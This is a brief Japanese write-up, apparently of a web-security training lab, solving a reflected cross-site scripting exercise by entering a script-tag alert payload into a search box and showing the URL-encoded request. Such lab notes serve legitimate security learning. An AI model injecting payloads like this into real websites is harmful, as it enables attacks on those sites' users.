Hello there, ('ω')ノ
エンコードせずにXSSをHTMLコンテキストに反映を。
下記を入力して検索すると。
<script>alert(1)</script>
スクリプトが実行されて。
クリアできた。
リクエストは、下記のようにエンコードされていて。
GET /?search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
パラメータをURLデコードして確認して。
Best regards, (^^ゞ